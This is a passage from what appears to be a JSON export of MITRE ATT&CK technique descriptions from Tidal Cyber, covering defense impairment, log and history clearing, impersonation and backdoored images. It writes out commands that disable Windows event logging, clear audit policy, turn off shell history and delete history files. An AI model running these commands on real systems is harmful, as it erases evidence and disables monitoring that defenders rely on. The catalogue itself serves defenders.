Blocking](https://app.tidalcyber.com/technique/154dccf2-21fa-4aee-99cc-d959d841f8b1), adversaries may unhook or otherwise modify these features added by tools (especially those that exist in userland or are otherwise potentially accessible to adversaries) to avoid detection.[[OutFlank System Calls](https://app.tidalcyber.com/references/c4c3370a-2d6b-4ebd-961e-58d584066377)][[MDSec System Calls](https://app.tidalcyber.com/references/b461e226-1317-4ce4-a195-ba4c4957db99)] \n\nAdversaries may also focus on specific applications such as Sysmon. For example, the “Start” and “Enable” values in HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\WMI\\Autologger\\EventLog-Microsoft-Windows-Sysmon-Operational may be modified to tamper with and potentially disable Sysmon logging.[[disable_win_evt_logging](https://app.tidalcyber.com/references/408c0c8c-5d8e-5ebe-bd31-81b405c615d8)] \n\nOn network devices, adversaries may attempt to skip digital signature verification checks by altering startup configuration files and effectively disabling firmware verification that typically occurs at boot.[[Fortinet Zero-Day and Custom Malware Used by Suspected Chinese Actor in Espionage Operation](https://app.tidalcyber.com/references/a43dd8ce-23d6-5768-8522-6973dc45e1ac)][[Analysis of FG-IR-22-369](https://app.tidalcyber.com/references/f12b141e-6bb2-5563-9665-5756fec2d5e7)]\n\nIn cloud environments, tools disabled by adversaries may include cloud monitoring agents that report back to services such as AWS CloudWatch or Google Cloud Monitor.\n\nFurthermore, although defensive tools may have anti-tampering mechanisms, adversaries may abuse tools such as legitimate rootkit removal kits to impair and/or disable these tools.[[chasing_avaddon_ransomware](https://app.tidalcyber.com/references/c5aeed6b-2d5d-4d49-b05e-261d565808d9)][[dharma_ransomware](https://app.tidalcyber.com/references/dfd168c0-40da-4402-a123-963eb8e2125a)][[demystifying_ryuk](https://app.tidalcyber.com/references/3dc684c7-14de-4dc0-9f11-79160c4f5038)][[doppelpaymer_crowdstrike](https://app.tidalcyber.com/references/54b5d8af-21f0-4d1c-ada8-b87db85dd742)] For example, adversaries have used tools such as GMER to find and shut down hidden processes and antivirus software on infected systems.[[demystifying_ryuk](https://app.tidalcyber.com/references/3dc684c7-14de-4dc0-9f11-79160c4f5038)]\n\nAdditionally, adversaries may exploit legitimate drivers from anti-virus software to gain access to kernel space (i.e. [Exploitation for Privilege Escalation](https://app.tidalcyber.com/technique/9cc715d7-9969-485f-87a2-c9f7ed3cc44c)), which may lead to bypassing anti-tampering features.[[avoslocker_ransomware](https://app.tidalcyber.com/references/ea2756ce-a183-4c80-af11-92374ad045b2)]", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1562.001" + }, + "related": [ + { + "dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726", + "type": "uses" + } + ], + "uuid": "9f290216-b2ab-47b5-b9ae-a94ae6d357c6", + "value": "Disable or Modify Tools" + }, + { + "description": "Adversaries may disable Windows event logging to limit data that can be leveraged for detections and audits. Windows event logs record user and system activity such as login attempts, process creation, and much more.[[Windows Log Events](https://app.tidalcyber.com/references/53464503-6e6f-45d8-a208-1820678deeac)] This data is used by security tools and analysts to generate detections.\n\nThe EventLog service maintains event logs from various system components and applications.[[EventLog_Core_Technologies](https://app.tidalcyber.com/references/2a1f452f-57b6-4764-b474-befa7787642d)] By default, the service automatically starts when a system powers on. An audit policy, maintained by the Local Security Policy (secpol.msc), defines which system events the EventLog service logs. Security audit policy settings can be changed by running secpol.msc, then navigating to Security Settings\\Local Policies\\Audit Policy for basic audit policy settings or Security Settings\\Advanced Audit Policy Configuration for advanced audit policy settings.[[Audit_Policy_Microsoft](https://app.tidalcyber.com/references/9ff43f64-7fcb-4aa3-9599-9d00774d8da5)][[Advanced_sec_audit_policy_settings](https://app.tidalcyber.com/references/9aef57b1-1a2e-4833-815e-887616cc0570)] auditpol.exe may also be used to set audit policies.[[auditpol](https://app.tidalcyber.com/references/20d18ecf-d7d3-4433-9a3c-c28be71de4b1)]\n\nAdversaries may target system-wide logging or just that of a particular application. For example, the Windows EventLog service may be disabled using the Set-Service -Name EventLog -Status Stopped or sc config eventlog start=disabled commands (followed by manually stopping the service using Stop-Service -Name EventLog).[[Disable_Win_Event_Logging](https://app.tidalcyber.com/references/0fa5e507-33dc-40ea-b960-bcd9aa024ab1)][[disable_win_evt_logging](https://app.tidalcyber.com/references/408c0c8c-5d8e-5ebe-bd31-81b405c615d8)] Additionally, the service may be disabled by modifying the “Start” value in HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\EventLog then restarting the system for the change to take effect.[[disable_win_evt_logging](https://app.tidalcyber.com/references/408c0c8c-5d8e-5ebe-bd31-81b405c615d8)]\n\nThere are several ways to disable the EventLog service via registry key modification. First, without Administrator privileges, adversaries may modify the \"Start\" value in the key HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\WMI\\Autologger\\EventLog-Security, then reboot the system to disable the Security EventLog.[[winser19_file_overwrite_bug_twitter](https://app.tidalcyber.com/references/158d971e-2f96-5200-8a87-d3887de30ff0)] Second, with Administrator privilege, adversaries may modify the same values in HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\WMI\\Autologger\\EventLog-System and HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\WMI\\Autologger\\EventLog-Application to disable the entire EventLog.[[disable_win_evt_logging](https://app.tidalcyber.com/references/408c0c8c-5d8e-5ebe-bd31-81b405c615d8)]\n\nAdditionally, adversaries may use auditpol and its sub-commands in a command prompt to disable auditing or clear the audit policy. To enable or disable a specified setting or audit category, adversaries may use the /success or /failure parameters. For example, auditpol /set /category:”Account Logon” /success:disable /failure:disable turns off auditing for the Account Logon category.[[auditpol.exe_STRONTIC](https://app.tidalcyber.com/references/c8a305b3-cd17-4415-a740-32787da703cd)][[T1562.002_redcanaryco](https://app.tidalcyber.com/references/e136f5a2-d4c2-4c6c-8f72-0f8ed9abeed1)] To clear the audit policy, adversaries may run the following lines: auditpol /clear /y or auditpol /remove /allusers.[[T1562.002_redcanaryco](https://app.tidalcyber.com/references/e136f5a2-d4c2-4c6c-8f72-0f8ed9abeed1)]\n\nBy disabling Windows event logging, adversaries can operate while leaving less evidence of a compromise behind.", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1562.002" + }, + "related": [ + { + "dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726", + "type": "uses" + } + ], + "uuid": "97918962-6509-4369-b2b5-5d02681c6700", + "value": "Disable Windows Event Logging" + }, + { + "description": "Adversaries may downgrade or use a version of system features that may be outdated, vulnerable, and/or does not support updated security controls. Downgrade attacks typically take advantage of a system’s backward compatibility to force it into less secure modes of operation. \n\nAdversaries may downgrade and use various less-secure versions of features of a system, such as [Command and Scripting Interpreter](https://app.tidalcyber.com/technique/a2184d53-63b1-4c40-81ed-da799080c36c)s or even network protocols that can be abused to enable [Adversary-in-the-Middle](https://app.tidalcyber.com/technique/d98dbf30-c454-42ff-a9f3-2cd3319cc0d9) or [Network Sniffing](https://app.tidalcyber.com/technique/bbad213d-477d-43bf-9501-ad7d74bac323).[[Praetorian TLS Downgrade Attack 2014](https://app.tidalcyber.com/references/4375602d-4b5f-476d-82f8-3cef84d3378e)] For example, [PowerShell](https://app.tidalcyber.com/technique/6ca7838a-e8ad-43e8-9da6-15b640d1cbde) versions 5+ includes Script Block Logging (SBL) which can record executed script content. However, adversaries may attempt to execute a previous version of PowerShell that does not support SBL with the intent to [Impair Defenses](https://app.tidalcyber.com/technique/e3be3d76-0a36-4060-8003-3b39c557f728) while running malicious scripts that may have otherwise been detected.[[CrowdStrike BGH Ransomware 2021](https://app.tidalcyber.com/references/a4cb3caf-e7ef-4662-93c6-63a0c3352a32)][[Mandiant BYOL 2018](https://app.tidalcyber.com/references/104a1c1c-0899-4ff9-a5c4-73de702c467d)][[att_def_ps_logging](https://app.tidalcyber.com/references/52212570-b1a6-4249-99d4-3bcf66c27140)]\n\nAdversaries may similarly target network traffic to downgrade from an encrypted HTTPS connection to an unsecured HTTP connection that exposes network data in clear text.[[Targeted SSL Stripping Attacks Are Real](https://app.tidalcyber.com/references/714528e8-0f2e-50a3-93c0-c560a34ba973)][[Crowdstrike Downgrade](https://app.tidalcyber.com/references/47856c5f-6c4c-5b4c-bbc1-ccb6848d9b74)]", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1562.010" + }, + "related": [ + { + "dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726", + "type": "uses" + } + ], + "uuid": "257fffe4-d17b-4e63-a41c-8388936d6215", + "value": "Downgrade Attack" + }, + { + "description": "Adversaries may impair command history logging to hide commands they run on a compromised system. Various command interpreters keep track of the commands users type in their terminal so that users can retrace what they've done. \n\nOn Linux and macOS, command history is tracked in a file pointed to by the environment variable HISTFILE. When a user logs off a system, this information is flushed to a file in the user's home directory called ~/.bash_history. The HISTCONTROL environment variable keeps track of what should be saved by the history command and eventually into the ~/.bash_history file when a user logs out. HISTCONTROL does not exist by default on macOS, but can be set by the user and will be respected.\n\nAdversaries may clear the history environment variable (unset HISTFILE) or set the command history size to zero (export HISTFILESIZE=0) to prevent logging of commands. Additionally, HISTCONTROL can be configured to ignore commands that start with a space by simply setting it to \"ignorespace\". HISTCONTROL can also be set to ignore duplicate commands by setting it to \"ignoredups\". In some Linux systems, this is set by default to \"ignoreboth\" which covers both of the previous examples. This means that “ ls” will not be saved, but “ls” would be saved by history. Adversaries can abuse this to operate without leaving traces by simply prepending a space to all of their terminal commands. \n\nOn Windows systems, the PSReadLine module tracks commands used in all PowerShell sessions and writes them to a file ($env:APPDATA\\Microsoft\\Windows\\PowerShell\\PSReadLine\\ConsoleHost_history.txt by default). Adversaries may change where these logs are saved using Set-PSReadLineOption -HistorySavePath {File Path}. This will cause ConsoleHost_history.txt to stop receiving logs. Additionally, it is possible to turn off logging to this file using the PowerShell command Set-PSReadlineOption -HistorySaveStyle SaveNothing.[[Microsoft PowerShell Command History](https://app.tidalcyber.com/references/6c873fb4-db43-4bad-b5e4-a7d45cbe796f)][[Sophos PowerShell command audit](https://app.tidalcyber.com/references/441f289c-7fdc-4cf1-9379-960be75c7202)][[Sophos PowerShell Command History Forensics](https://app.tidalcyber.com/references/9cff28da-c379-49e7-b971-7dccc72054fc)]\n\nAdversaries may also leverage a [Network Device CLI](https://app.tidalcyber.com/technique/284bfbb3-99f0-4c3d-bc1f-ab74065b7907) on network devices to disable historical command logging (e.g. no logging).", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1562.003" + }, + "related": [ + { + "dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726", + "type": "uses" + } + ], + "uuid": "fe8b3b28-41ad-405b-a2b8-9c10048550c2", + "value": "Impair Command History Logging" + }, + { + "description": "An adversary may attempt to block indicators or events typically captured by sensors from being gathered and analyzed. This could include maliciously redirecting[[Microsoft Lamin Sept 2017](https://app.tidalcyber.com/references/84b8b159-6e85-4329-8903-aca156f4ed84)] or even disabling host-based sensors, such as Event Tracing for Windows (ETW)[[Microsoft About Event Tracing 2018](https://app.tidalcyber.com/references/689d944f-ad66-4908-91fb-bb1ecdafe8d9)], by tampering settings that control the collection and flow of event telemetry.[[Medium Event Tracing Tampering 2018](https://app.tidalcyber.com/references/cd1a7b9a-183f-4acf-95c8-14d9475d0551)] These settings may be stored on the system in configuration files and/or in the Registry as well as being accessible via administrative utilities such as [PowerShell](https://app.tidalcyber.com/technique/6ca7838a-e8ad-43e8-9da6-15b640d1cbde) or [Windows Management Instrumentation](https://app.tidalcyber.com/technique/c37795d9-8970-461f-9491-3086d6b4b69a).\n\nFor example, adversaries may modify the `File` value in HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\EventLog\\Security to hide their malicious actions in a new or different .evtx log file. This action does not require a system reboot and takes effect immediately.[[disable_win_evt_logging](https://app.tidalcyber.com/references/408c0c8c-5d8e-5ebe-bd31-81b405c615d8)] \n\nETW interruption can be achieved multiple ways, however most directly by defining conditions using the [PowerShell](https://app.tidalcyber.com/technique/6ca7838a-e8ad-43e8-9da6-15b640d1cbde) Set-EtwTraceProvider cmdlet or by interfacing directly with the Registry to make alterations.\n\nIn the case of network-based reporting of indicators, an adversary may block traffic associated with reporting to prevent central analysis. This may be accomplished by many means, such as stopping a local process responsible for forwarding telemetry and/or creating a host-based firewall rule to block traffic to specific hosts responsible for aggregating events, such as security information and event management (SIEM) products.\n\nIn Linux environments, adversaries may disable or reconfigure log processing tools such as syslog or nxlog to inhibit detection and monitoring capabilities to facilitate follow on behaviors [[LemonDuck](https://app.tidalcyber.com/references/3a7ea56a-3b19-4b69-a206-6eb7c4ae609d)].", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1562.006" + }, + "related": [ + { + "dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726", + "type": "uses" + } + ], + "uuid": "154dccf2-21fa-4aee-99cc-d959d841f8b1", + "value": "Indicator Blocking" + }, + { + "description": "Adversaries may abuse Windows safe mode to disable endpoint defenses. Safe mode starts up the Windows operating system with a limited set of drivers and services. Third-party security software such as endpoint detection and response (EDR) tools may not start after booting Windows in safe mode. There are two versions of safe mode: Safe Mode and Safe Mode with Networking. It is possible to start additional services after a safe mode boot.[[Microsoft Safe Mode](https://app.tidalcyber.com/references/fdddb25b-22ba-4433-b25f-bad340ffc849)][[Sophos Snatch Ransomware 2019](https://app.tidalcyber.com/references/63019d16-07ec-4e53-98b7-529cc09b8429)]\n\nAdversaries may abuse safe mode to disable endpoint defenses that may not start with a limited boot. Hosts can be forced into safe mode after the next reboot via modifications to Boot Configuration Data (BCD) stores, which are files that manage boot application settings.[[Microsoft bcdedit 2021](https://app.tidalcyber.com/references/40dedfcb-f666-4f2d-a518-5cd4ae2e273c)]\n\nAdversaries may also add their malicious applications to the list of minimal services that start in safe mode by modifying relevant Registry values (i.e. [Modify Registry](https://app.tidalcyber.com/technique/0dfeab84-3c42-4b56-9021-70fe5be4092b)). Malicious [Component Object Model](https://app.tidalcyber.com/technique/8bc683db-1311-476f-8cae-45f3f89dcc66) (COM) objects may also be registered and loaded in safe mode.[[Sophos Snatch Ransomware 2019](https://app.tidalcyber.com/references/63019d16-07ec-4e53-98b7-529cc09b8429)][[CyberArk Labs Safe Mode 2016](https://app.tidalcyber.com/references/bd9c14dd-0e2a-447b-a245-f548734d2400)][[Cybereason Nocturnus MedusaLocker 2020](https://app.tidalcyber.com/references/f7b41120-8455-409f-ad9c-815c2c43edfd)][[BleepingComputer REvil 2021](https://app.tidalcyber.com/references/790ef274-aea4-49b7-8b59-1b95185c5f50)]", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1562.009" + }, + "related": [ + { + "dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726", + "type": "uses" + } + ], + "uuid": "e6549d57-de83-4fee-96f1-2c4a1cdb654f", + "value": "Safe Mode Boot" + }, + { + "description": "Adversaries may spoof security alerting from tools, presenting false evidence to impair defenders’ awareness of malicious activity.[[BlackBasta](https://app.tidalcyber.com/references/c7e55e37-d051-5111-8d0a-738656f88650)] Messages produced by defensive tools contain information about potential security events as well as the functioning status of security software and the system. Security reporting messages are important for monitoring the normal operation of a system and identifying important events that can signal a security incident.\n\nRather than or in addition to [Indicator Blocking](https://app.tidalcyber.com/technique/154dccf2-21fa-4aee-99cc-d959d841f8b1), an adversary can spoof positive affirmations that security tools are continuing to function even after legitimate security tools have been disabled (e.g., [Disable or Modify Tools](https://app.tidalcyber.com/technique/9f290216-b2ab-47b5-b9ae-a94ae6d357c6)). An adversary can also present a “healthy” system status even after infection. This can be abused to enable further malicious activity by delaying defender responses.\n\nFor example, adversaries may show a fake Windows Security GUI and tray icon with a “healthy” system status after Windows Defender and other system tools have been disabled.[[BlackBasta](https://app.tidalcyber.com/references/c7e55e37-d051-5111-8d0a-738656f88650)]", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1562.011" + }, + "related": [ + { + "dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726", + "type": "uses" + } + ], + "uuid": "67fa2827-fd64-5bf7-bf77-27b6ffc8f77f", + "value": "Spoof Security Alerting" + }, + { + "description": "Adversaries may maliciously modify components of a victim environment in order to hinder or disable defensive mechanisms. This not only involves impairing preventative defenses, such as firewalls and anti-virus, but also detection capabilities that defenders can use to audit activity and identify malicious behavior. This may also span both native defenses as well as supplemental capabilities installed by users and administrators.\n\nAdversaries may also impair routine operations that contribute to defensive hygiene, such as blocking users from logging out of a computer or stopping it from being shut down. These restrictions can further enable malicious operations as well as the continued propagation of incidents.[[Emotet shutdown](https://app.tidalcyber.com/references/02e6c7bf-f81c-53a3-b771-fd77d4cdb5a0)]\n\nAdversaries could also target event aggregation and analysis mechanisms, or otherwise disrupt these procedures by altering other system components.", + "meta": { + "platforms": [ + "Containers", + "IaaS", + "Linux", + "macOS", + "Network", + "Office 365", + "Windows" + ], + "source": "MITRE", + "tags": [] + }, + "related": [ + { + "dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726", + "type": "uses" + }, + { + "dest-uuid": "ccb72576-4e85-4c7b-89b8-fa67cc6cdbef", + "type": "similar" + }, + { + "dest-uuid": "6824cdb3-a4c5-45a8-a3d5-5a5afd347214", + "type": "similar" + }, + { + "dest-uuid": "d9eb2887-840e-5ed7-bb4b-3b210f4147f9", + "type": "similar" + }, + { + "dest-uuid": "4f7d0afb-92ce-429b-9ef5-dc6a7fc4f4a8", + "type": "similar" + }, + { + "dest-uuid": "9f290216-b2ab-47b5-b9ae-a94ae6d357c6", + "type": "similar" + }, + { + "dest-uuid": "97918962-6509-4369-b2b5-5d02681c6700", + "type": "similar" + }, + { + "dest-uuid": "257fffe4-d17b-4e63-a41c-8388936d6215", + "type": "similar" + }, + { + "dest-uuid": "fe8b3b28-41ad-405b-a2b8-9c10048550c2", + "type": "similar" + }, + { + "dest-uuid": "154dccf2-21fa-4aee-99cc-d959d841f8b1", + "type": "similar" + }, + { + "dest-uuid": "e6549d57-de83-4fee-96f1-2c4a1cdb654f", + "type": "similar" + }, + { + "dest-uuid": "67fa2827-fd64-5bf7-bf77-27b6ffc8f77f", + "type": "similar" + } + ], + "uuid": "e3be3d76-0a36-4060-8003-3b39c557f728", + "value": "Impair Defenses" + }, + { + "description": "Adversaries may impersonate a trusted person or organization in order to persuade and trick a target into performing some action on their behalf. For example, adversaries may communicate with victims (via [Phishing for Information](https://app.tidalcyber.com/technique/b6fe2fda-9c05-4f05-b049-7bb5b9ba5b06), [Phishing](https://app.tidalcyber.com/technique/d4a36624-50cb-43d3-95af-a2e10878a533), or [Internal Spearphishing](https://app.tidalcyber.com/technique/4f4ea659-7653-4bfd-a525-b2af32c5899b)) while impersonating a known sender such as an executive, colleague, or third-party vendor. Established trust can then be leveraged to accomplish an adversary’s ultimate goals, possibly against multiple victims. \n \nIn many cases of business email compromise or email fraud campaigns, adversaries use impersonation to defraud victims -- deceiving them into sending money or divulging information that ultimately enables [Financial Theft](https://app.tidalcyber.com/technique/b9c9fd13-c10c-5e78-aeeb-ac18dc0605f9).\n\nAdversaries will often also use social engineering techniques such as manipulative and persuasive language in email subject lines and body text such as `payment`, `request`, or `urgent` to push the victim to act quickly before malicious activity is detected. These campaigns are often specifically targeted against people who, due to job roles and/or accesses, can carry out the adversary’s goal.   \n \nImpersonation is typically preceded by reconnaissance techniques such as [Gather Victim Identity Information](https://app.tidalcyber.com/technique/aea36489-047e-4c4a-ab26-c51fd3556182) and [Gather Victim Org Information](https://app.tidalcyber.com/technique/e55d2e4b-07d8-4c22-b543-c187be320578) as well as acquiring infrastructure such as email domains (i.e. [Domains](https://app.tidalcyber.com/technique/b9f5f6b7-ecff-48c8-a23e-c58fd9e41a0d)) to substantiate their false identity.[[CrowdStrike-BEC](https://app.tidalcyber.com/references/7e674a8d-e79f-5cb0-8ad2-a7678e647c6f)]\n \nThere is the potential for multiple victims in campaigns involving impersonation. For example, an adversary may [Compromise Accounts](https://app.tidalcyber.com/technique/c6374cbe-799a-4648-b1e2-2a66bb42d3f3) targeting one organization which can then be used to support impersonation against other entities.[[VEC](https://app.tidalcyber.com/references/4fd7c9f7-4731-524a-b332-9cb7f2c025ae)]", + "meta": { + "platforms": [ + "Google Workspace", + "Linux", + "macOS", + "Office 365", + "SaaS", + "Windows" + ], + "source": "MITRE", + "tags": [] + }, + "related": [ + { + "dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726", + "type": "uses" + } + ], + "uuid": "20417e43-6ffa-5d36-a2ef-e27cd5a4b8f1", + "value": "Impersonation" + }, + { + "description": "Adversaries may implant cloud or container images with malicious code to establish persistence after gaining access to an environment. Amazon Web Services (AWS) Amazon Machine Images (AMIs), Google Cloud Platform (GCP) Images, and Azure Images as well as popular container runtimes such as Docker can be implanted or backdoored. Unlike [Upload Malware](https://app.tidalcyber.com/technique/8ecf5275-c6d1-4fe3-a24a-63fa1f3144fe), this technique focuses on adversaries implanting an image in a registry within a victim’s environment. Depending on how the infrastructure is provisioned, this could provide persistent access if the infrastructure provisioning tool is instructed to always use the latest image.[[Rhino Labs Cloud Image Backdoor Technique Sept 2019](https://app.tidalcyber.com/references/8fb46ed8-0c21-4b57-b2a6-89cb28f0abaf)]\n\nA tool has been developed to facilitate planting backdoors in cloud container images.[[Rhino Labs Cloud Backdoor September 2019](https://app.tidalcyber.com/references/ac31b781-dbe4-49c2-b7af-dfb23d435ce8)] If an adversary has access to a compromised AWS instance, and permissions to list the available container images, they may implant a backdoor such as a [Web Shell](https://app.tidalcyber.com/technique/05a5318f-476d-44c1-8a85-9466295d31dd).[[Rhino Labs Cloud Image Backdoor Technique Sept 2019](https://app.tidalcyber.com/references/8fb46ed8-0c21-4b57-b2a6-89cb28f0abaf)]", + "meta": { + "platforms": [ + "Containers", + "IaaS" + ], + "source": "MITRE", + "tags": [] + }, + "related": [ + { + "dest-uuid": "ec4f9786-c00c-430a-bc6d-0d0d22fdd393", + "type": "uses" + } + ], + "uuid": "b4f2b54c-d304-4e05-a813-69bc7e6fd1f3", + "value": "Implant Internal Image" + }, + { + "description": "In addition to clearing system logs, an adversary may clear the command history of a compromised account to conceal the actions undertaken during an intrusion. Various command interpreters keep track of the commands users type in their terminal so that users can retrace what they've done.\n\nOn Linux and macOS, these command histories can be accessed in a few different ways. While logged in, this command history is tracked in a file pointed to by the environment variable HISTFILE. When a user logs off a system, this information is flushed to a file in the user's home directory called ~/.bash_history. The benefit of this is that it allows users to go back to commands they've used before in different sessions.\n\nAdversaries may delete their commands from these logs by manually clearing the history (history -c) or deleting the bash history file rm ~/.bash_history. \n\nAdversaries may also leverage a [Network Device CLI](https://app.tidalcyber.com/technique/284bfbb3-99f0-4c3d-bc1f-ab74065b7907) on network devices to clear command history data (clear logging and/or clear history).[[US-CERT-TA18-106A](https://app.tidalcyber.com/references/1fe55557-94af-4697-a675-884701f70f2a)]\n\nOn Windows hosts, PowerShell has two different command history providers: the built-in history and the command history managed by the PSReadLine module. The built-in history only tracks the commands used in the current session. This command history is not available to other sessions and is deleted when the session ends.\n\nThe PSReadLine command history tracks the commands used in all PowerShell sessions and writes them to a file ($env:APPDATA\\Microsoft\\Windows\\PowerShell\\PSReadLine\\ConsoleHost_history.txt by default). This history file is available to all sessions and contains all past history since the file is not deleted when the session ends.[[Microsoft PowerShell Command History](https://app.tidalcyber.com/references/6c873fb4-db43-4bad-b5e4-a7d45cbe796f)]\n\nAdversaries may run the PowerShell command Clear-History to flush the entire command history from a current PowerShell session. This, however, will not delete/flush the ConsoleHost_history.txt file. Adversaries may also delete the ConsoleHost_history.txt file or edit its contents to hide PowerShell commands they have run.[[Sophos PowerShell command audit](https://app.tidalcyber.com/references/441f289c-7fdc-4cf1-9379-960be75c7202)][[Sophos PowerShell Command History Forensics](https://app.tidalcyber.com/references/9cff28da-c379-49e7-b971-7dccc72054fc)]", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1070.003" + }, + "related": [ + { + "dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726", + "type": "uses" + } + ], + "uuid": "074cf118-cd7f-41c2-bb54-43380bfa45ca", + "value": "Clear Command History" + }, + { + "description": "Adversaries may clear system logs to hide evidence of an intrusion. macOS and Linux both keep track of system or user-initiated actions via system logs. The majority of native system logging is stored under the /var/log/ directory. Subfolders in this directory categorize logs by their related functions, such as:[[Linux Logs](https://app.tidalcyber.com/references/aa25e385-802c-4f04-81bb-bb7d1a7599ec)]\n\n* /var/log/messages:: General and system-related messages\n* /var/log/secure or /var/log/auth.log: Authentication logs\n* /var/log/utmp or /var/log/wtmp: Login records\n* /var/log/kern.log: Kernel logs\n* /var/log/cron.log: Crond logs\n* /var/log/maillog: Mail server logs\n* /var/log/httpd/: Web server access and error logs\n", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1070.002" + }, + "related": [ + { + "dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726", + "type": "uses" + } + ], + "uuid": "2f32c30e-b79a-497a-b05f-ab8bd93aa689", + "value": "Clear Linux or Mac System Logs" + }, + { + "description": "Adversaries may modify mail and mail application data to remove evidence of their activity. Email applications allow users and other programs to export and delete mailbox data via command line tools or use of APIs. Mail application data can be emails, email metadata, or logs generated by the application or operating system, such as export requests. \n\nAdversaries may manipulate emails and mailbox data to remove logs, artifacts, and metadata, such as evidence of [Phishing](https://app.tidalcyber.com/technique/d4a36624-50cb-43d3-95af-a2e10878a533)/[Internal Spearphishing](https://app.tidalcyber.com/technique/4f4ea659-7653-4bfd-a525-b2af32c5899b), [Email Collection](https://app.tidalcyber.com/technique/3569b783-1be5-414b-adb9-42c47ceee1cc), [Mail Protocols](https://app.tidalcyber.com/technique/350fd3f9-2d62-498f-be62-fc4b9907ff02) for command and control, or email-based exfiltration such as [Exfiltration Over Alternative Protocol](https://app.tidalcyber.com/technique/192d25ea-bae1-48e4-88de-e0acd481ab88). For example, to remove evidence on Exchange servers adversaries have used the ExchangePowerShell [PowerShell](https://app.tidalcyber.com/technique/6ca7838a-e8ad-43e8-9da6-15b640d1cbde) module, including Remove-MailboxExportRequest to remove evidence of mailbox exports.[[Volexity SolarWinds](https://app.tidalcyber.com/references/355cecf8-ef3e-4a6e-a652-3bf26fe46d88)][[ExchangePowerShell Module](https://app.tidalcyber.com/references/8af67c2a-15e2-48c9-9ec2-b62ffca0f677)] On Linux and macOS, adversaries may also delete emails through a command line utility called mail or use [AppleScript](https://app.tidalcyber.com/technique/9f06ef9b-d587-41d3-8fc8-7d539dac5701) to interact with APIs on macOS.[[Cybereason Cobalt Kitty 2017](https://app.tidalcyber.com/references/bf838a23-1620-4668-807a-4354083d69b1)][[mailx man page](https://app.tidalcyber.com/references/6813a1a2-fbe0-4809-aad7-734997e59bea)]\n\nAdversaries may also remove emails and metadata/headers indicative of spam or suspicious activity (for example, through the use of organization-wide transport rules) to reduce the likelihood of malicious emails being detected by security products.[[Microsoft OAuth Spam 2022](https://app.tidalcyber.com/references/086c06a0-3960-5fa8-b034-cef37a3aee90)]", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1070.008" + }, + "related": [ + { + "dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726", + "type": "uses" + } + ], + "uuid": "64fd8f4d-5725-46c8-a37a-020a706db1e4", + "value": "Clear Mailbox Data" + }, + { + "description": "Adversaries may clear or remove evidence of malicious network connections in order to clean up traces of their operations. Configuration settings as well as various artifacts that highlight connection history may be created on a system and/or in application logs from behaviors that require network connections, such as [Remote Services](https://app.tidalcyber.com/technique/30ef3f13-5e9b-4712-9adf-f0da4ef157a1) or [External Remote Services](https://app.tidalcyber.com/technique/c1f7e330-f1c4-4923-b8ad-bbd79cc63cb4). Defenders may use these artifacts to monitor or otherwise analyze network connections created by adversaries.\n\nNetwork connection history may be stored in various locations. For example, RDP connection history may be stored in Windows Registry values under [[Microsoft RDP Removal](https://app.tidalcyber.com/references/367d3f80-9b13-44fa-938a-744a95518571)]:\n\n* HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Default\n* HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Servers\n\nWindows may also store information about recent RDP connections in files such as C:\\Users\\\\%username%\\Documents\\Default.rdp and `C:\\Users\\%username%\\AppData\\Local\\Microsoft\\Terminal\nServer Client\\Cache\\`.[[Moran RDPieces](https://app.tidalcyber.com/references/794331fb-f1f2-4aaa-aae8-d1c4c95fb00f)] Similarly, macOS and Linux hosts may store information highlighting connection history in system logs (such as those stored in `/Library/Logs` and/or `/var/log/`).[[Apple Culprit Access](https://app.tidalcyber.com/references/9254d3f5-7fc1-4710-b885-b0ddb3a3dca9)][[FreeDesktop Journal](https://app.tidalcyber.com/references/5ded9060-9a23-42dc-b13b-15e4e3ccabf9)][[Apple Unified Log Analysis Remote Login and Screen Sharing](https://app.tidalcyber.com/references/a2169171-8e4a-4faa-811c-98b6204a5a57)]\n\nMalicious network connections may also require changes to third-party applications or network configuration settings, such as [Disable or Modify System Firewall](https://app.tidalcyber.com/technique/4f7d0afb-92ce-429b-9ef5-dc6a7fc4f4a8) or tampering to enable [Proxy](https://app.tidalcyber.com/technique/ba6a869a-c870-4be6-bc08-e078f0efdc3b). Adversaries may delete or modify this data to conceal indicators and/or impede defensive analysis.", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1070.007" + }, + "related": [ + { + "dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726", + "type": "uses" + } + ], + "uuid": "39d589f9-fa73-4988-95e2-2a022851d8b8", + "value": "Clear Network Connection History and Configurations" + }, + { + "description": "Adversaries may clear artifacts associated with previously established persistence on a host system to remove evidence of their activity. This may involve various actions, such as removing services, deleting executables, [Modify 